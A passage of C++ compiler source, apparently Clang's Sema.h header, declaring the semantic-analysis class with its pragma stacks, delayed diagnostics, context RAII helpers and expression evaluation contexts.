class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
/// Keeps track of the expected type during expression parsing. The type is
/// tied to a particular token; all functions that update or consume the type
/// take the start location of the token they are looking at as a parameter.
/// This allows us to avoid updating the type on hot paths in the parser.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this function, as it stores a
/// function_ref; clients should make sure all calls to get() with the same
/// location happen while the function_ref is alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
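// Usage sketch (not from this file; names assumed from the class's own API):
// the parser owns a PreferredTypeBuilder, calls an enter*() hook when it
// starts a construct, e.g.
//   PreferredType.enterReturn(Actions, Tok.getLocation());
// and code completion later reads the expectation back with
//   QualType T = PreferredType.get(Tok.getLocation());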
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
/// Source of additional semantic information.
ExternalSemaSource *ExternalSource;
/// Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
/// The maximum alignment, same as in llvm::Value. We duplicate the constants
/// here because we can't directly use the llvm constants, and keeping a
/// single copy here avoids duplicating them throughout clang code.
/// The value is verified against llvm here: lib/CodeGen/CGDecl.cpp
///
/// This is the greatest alignment value supported by load, store, and alloca
/// instructions, and global values.
static const unsigned MaxAlignmentExponent = 29;
static const unsigned MaximumAlignment = 1u << MaxAlignmentExponent;
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions CurFPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method() {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// This stack tracks the current state of Sema.CurFPFeatures.
PragmaStack<unsigned> FpPragmaStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This is an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression.
SmallVector<ExprWithCleanups::CleanupObject, 8> ExprCleanupObjects;
/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
/// The index of the first FunctionScope that corresponds to the current
/// context.
unsigned FunctionScopesStart = 0;
ArrayRef<sema::FunctionScopeInfo*> getFunctionScopes() const {
return llvm::makeArrayRef(FunctionScopes.begin() + FunctionScopesStart,
FunctionScopes.end());
}
/// Stack containing information needed when an 'auto' is encountered in a
/// C++2a function declaration parameter type specifier, in order to invent a
/// corresponding template parameter in the enclosing abbreviated function
/// template. This information is also present in LambdaScopeInfo, stored in
/// the FunctionScopes stack.
SmallVector<InventedTemplateParameterInfo, 4> InventedParameterInfos;
/// The index of the first InventedParameterInfo that refers to the current
/// context.
unsigned InventedParameterInfosStart = 0;
ArrayRef<InventedTemplateParameterInfo> getInventedParameterInfos() const {
return llvm::makeArrayRef(InventedParameterInfos.begin() +
InventedParameterInfosStart,
InventedParameterInfos.end());
}
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list of all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of translation unit
///
/// This list contains class members, and locations of delete-expressions
/// that could not be proven as to whether they mismatch with new-expression
/// used in initializer of the field.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations which we have
/// emitted a list of pure virtual functions. Used to prevent emitting the
/// same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encountered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and must warn if not used. Only contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
unsigned SavedFunctionScopesStart;
unsigned SavedInventedParameterInfosStart;
public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride),
SavedFunctionScopesStart(S.FunctionScopesStart),
SavedInventedParameterInfosStart(S.InventedParameterInfosStart)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
// Any saved FunctionScopes do not refer to this context.
S.FunctionScopesStart = S.FunctionScopes.size();
S.InventedParameterInfosStart = S.InventedParameterInfos.size();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
S.FunctionScopesStart = SavedFunctionScopesStart;
S.InventedParameterInfosStart = SavedInventedParameterInfosStart;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
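// Usage sketch (hypothetical caller): push a declaration context for the
// duration of a scope and restore it automatically:
//   Sema::ContextRAII RAII(SemaRef, NewDC); // CurContext == NewDC from here
//   ... // semantic work inside NewDC
//   // destructor (or an explicit RAII.pop()) restores the previous context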
/// Whether the AST is currently being rebuilt to correct immediate
/// invocations. Immediate invocation candidates and references to consteval
/// functions aren't tracked when this is set.
bool RebuildingImmediateInvocation = false;
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
FD->setWillHaveBody(false);
S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
/// WeakUndeclaredIdentifiers - Identifiers contained in
/// \#pragma weak before being declared. Rare; they may alias another
/// identifier, declared or undeclared.
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in
/// \#pragma redefine_extname before being declared. Used in Solaris system headers
/// to define functions that occur in multiple standards to call the version
/// in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library reside.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// will hold 'respondsToSelector:'
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields.
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
using ImmediateInvocationCandidate = llvm::PointerIntPair<ConstantExpr *, 1>;
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are not discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// Set of candidates for starting an immediate invocation.
llvm::SmallVector<ImmediateInvocationCandidate, 4> ImmediateInvocationCandidates;
/// Set of DeclRefExprs referencing a consteval function when used in a
/// context not already known to be immediately invoked.
llvm::SmallPtrSet<DeclRefExpr *, 4> ReferenceToConsteval;
/// \brief Describes whether we are in an expression context which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
